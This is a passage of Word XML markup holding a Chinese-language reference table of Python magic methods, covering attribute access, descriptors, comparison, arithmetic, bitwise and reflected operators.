        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> format() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1E3E50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22494347" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有关属性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6C7D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__getattr__(self, name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当用户试图获取一个不存在的属性时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4C92A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__getattribute__(self, name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当该类的属性被访问时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A25ED7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__setattr__(self, name, value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当一个属性被设置时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001D400A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__delattr__(self, name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当一个属性被删除时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2E829E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__dir__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dir() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被调用时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C55D012" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__get__(self, instance, owner)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当描述符的值被取得时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031C47B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__set__(self, instance, value)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当描述符的值被改变时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF6FC3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__delete__(self, instance)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当描述符的值被删除时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143766B7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C27AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比较操作符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A6C8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__lt__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义小于号的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">x &lt; y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> x.__lt__(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7862C46B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__le__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义小于等于号的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">x &lt;= y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> x.__le__(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0016385B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__eq__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义等于号的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">x == y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> x.__eq__(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7CBBB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__ne__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义不等号的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">x != y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> x.__ne__(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A78AF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__gt__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义大于号的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">x &gt; y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> x.__gt__(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213495FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__ge__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义大于等于号的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">x &gt;= y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> x.__ge__(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796AB82A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E281860" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算数运算符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333BCAC1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__add__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义加法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DE2A94" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__sub__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义减法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411428C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__mul__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义乘法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D89A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__truediv__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义真除法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E459A77" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__floordiv__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义整数除法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F438AD1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__mod__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义取模算法的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3147A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__divmod__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> divmod() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0695747C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__pow__(self, other[, modulo])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> power() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ** </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运算时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA264BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__lshift__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义按位左移位的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FF2FCE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rshift__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义按位右移位的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D9AB75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__and__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义按位与操作的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07937522" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__xor__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义按位异或操作的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0153B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__or__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义按位或操作的行为：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F5A6CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0C7144" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反运算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07622E66" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__radd__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9AB9B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rsub__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3D0AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rmul__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F8D728" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__rtruediv__(self, other)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（与上方相同，当左操作数不支持相应的操作时被调用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43630BB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
